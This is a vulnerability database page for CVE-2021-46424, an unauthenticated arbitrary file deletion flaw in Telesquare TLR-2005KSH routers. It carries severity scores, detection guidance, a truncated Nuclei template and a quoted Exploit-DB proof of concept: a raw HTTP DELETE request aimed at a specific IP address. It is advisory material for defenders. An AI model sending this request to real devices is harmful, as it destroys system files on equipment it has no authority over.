CVE-2021-46424
published 2022-04-27CVE-2021-46424: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal…
PriorityP273critical9.1CVSS 3.1
AVNACLPRNUINSUCNIHAH
EXPLOIT
EPSS
36.83%
98.3th percentile
Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| telesquare | tlr-2005ksh_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated HTTP DELETE requests targeting paths on Telesquare TLR-2005KSH devices; a successful exploit returns HTTP 204 on DELETE and HTTP 404 on subsequent GET of the same resource. ↗
- →Fingerprint vulnerable devices via Shodan or FOFA by searching for the device identifier string in HTTP response bodies. ↗
- →No authentication is required to exploit this vulnerability; monitor for HTTP DELETE method usage from external/untrusted sources against this device. ↗
- →The vulnerability allows deletion of any file including system internal files via a DELETE HTTP request; alert on DELETE requests to /cgi-bin/ or /images/ paths on affected devices. ↗
- ·The exploit PoC targets a specific test file path (/cgi-bin/test2.txt) and a known static asset (/images/icons_title.gif), but the vulnerability is not limited to these paths — any file on the device can be deleted. ↗
- ·The Nuclei template uses a 3-step detection sequence (GET → DELETE → GET) and relies on HTTP status code transitions (200 → 204 → 404) to confirm exploitation; this is a destructive/intrusive check as it actually deletes the target file. ↗
CVSS provenance
nvdv3.19.1CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
nvdv2.09.4CRITICALAV:N/AC:L/Au:N/C:N/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TLR-2005KSH - Arbitrary File Delete
exploitdb·2022-05-12·CVSS 9.1
CVE-2021-46424 [CRITICAL] TLR-2005KSH - Arbitrary File Delete
TLR-2005KSH - Arbitrary File Delete
---
# Exploit Title: TLR-2005KSH - Arbitrary File Delete
# Date: 2022-05-11
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-46424
# Proof-of-Concept
# Request
DELETE /cgi-bin/test2.txt HTTP/1.1
Host: 220.89.223.215:8083
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Nuclei
Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete
nuclei·CVSS 9.1
CVE-2021-46424 [CRITICAL] Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete
Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete
Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.
Template:
id: CVE-2021-46424
info:
name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete
author: gy741
severity: critical
description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.
impact: |
Successful exploitation could lead to loss of critical data or system instability.
remediation: |
Apply the latest patch or update provided by the vendor to fix the vulnerability.
reference:
- https://dl.packetstormsecurity
No writeups or analysis indexed.
http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.htmlhttps://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharinghttp://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.htmlhttps://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing
2022-04-27
Published